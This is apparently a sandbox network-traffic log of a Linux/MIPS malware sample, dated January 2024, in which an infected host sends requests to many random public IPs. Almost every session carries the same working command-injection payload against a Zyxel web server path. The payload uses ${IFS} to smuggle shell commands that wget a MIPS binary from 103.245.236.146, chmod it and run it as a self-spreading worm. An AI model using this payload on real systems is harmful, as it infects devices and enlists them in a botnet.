                                                Jan 28, 2024 10:16:14.640575886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1677192.168.2.234839288.243.7.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.640599012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1678192.168.2.234094854.43.81.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.640625954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1679192.168.2.235117281.212.74.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.640678883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1680192.168.2.2342166184.167.147.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.640690088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1681192.168.2.2343412100.147.197.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.640724897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1682192.168.2.2348108216.232.113.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.640747070 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1683192.168.2.2353282188.172.133.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.640765905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1684192.168.2.2345640211.95.215.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.640804052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1685192.168.2.235422432.72.100.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.640832901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1686192.168.2.235494254.82.129.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.640888929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1687192.168.2.2347618208.95.164.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.640896082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1688192.168.2.2336022140.250.134.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.640908957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1689192.168.2.2353320221.177.133.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.640949965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1690192.168.2.2340090195.23.197.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.640960932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1691192.168.2.2336364153.143.23.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.640989065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1692192.168.2.233567824.251.231.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.641020060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1693192.168.2.2358508145.186.175.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.641027927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1694192.168.2.2356732103.32.94.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.641064882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1695192.168.2.2360912179.232.127.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.641077042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1696192.168.2.2355836189.203.118.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.641134024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1697192.168.2.236026645.114.80.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.641158104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1698192.168.2.2333408161.79.240.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.641192913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1699192.168.2.234070880.176.173.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.641207933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1700192.168.2.2354448120.99.218.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.641247988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1701192.168.2.2349344151.205.192.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.641285896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1702192.168.2.234712635.78.91.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.641309023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1703192.168.2.2340726209.46.252.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.641318083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1704192.168.2.2350688195.224.210.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.641340017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1705192.168.2.2350030220.84.222.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.641374111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1706192.168.2.233727690.253.79.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.641406059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1707192.168.2.233378027.11.64.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.641428947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1708192.168.2.2350238151.27.80.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.641457081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1709192.168.2.2356172212.33.199.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.641484022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1710192.168.2.2337214145.47.244.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.641505957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1711192.168.2.235281869.125.120.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.641530037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1712192.168.2.2334104161.99.27.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.641557932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1713192.168.2.235009617.50.145.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.641567945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1714192.168.2.2355784208.219.100.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.641594887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1715192.168.2.234235495.83.103.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.641642094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1716192.168.2.2351876190.225.45.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.641679049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1717192.168.2.2335658102.144.104.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.641686916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1718192.168.2.233311697.187.132.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.641727924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1719192.168.2.2355916130.232.105.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.641755104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1720192.168.2.2338198219.168.114.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.641773939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1721192.168.2.2353988133.123.156.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.641813993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1722192.168.2.2358222178.5.101.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.641824007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1723192.168.2.2356818153.196.85.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.641840935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1724192.168.2.2337614183.222.165.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.641901016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1725192.168.2.2350840146.130.161.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.641917944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1726192.168.2.2352480159.147.194.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.641943932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1727192.168.2.2358966132.221.143.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.641973019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1728192.168.2.23334304.107.167.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.642014980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1729192.168.2.2334768174.165.51.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.642029047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1730192.168.2.2336756184.111.218.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.642066956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1731192.168.2.234374638.9.189.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.642105103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1732192.168.2.235452277.244.234.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.642132998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1733192.168.2.2338690197.214.103.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.642165899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1734192.168.2.2342882191.44.83.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.642169952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1735192.168.2.235164617.64.148.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.642209053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1736192.168.2.2358006190.0.51.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.642234087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1737192.168.2.2342826205.44.201.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.642272949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1738192.168.2.2351186137.13.96.216443
                                                TimestampBytes transferredDirectionData
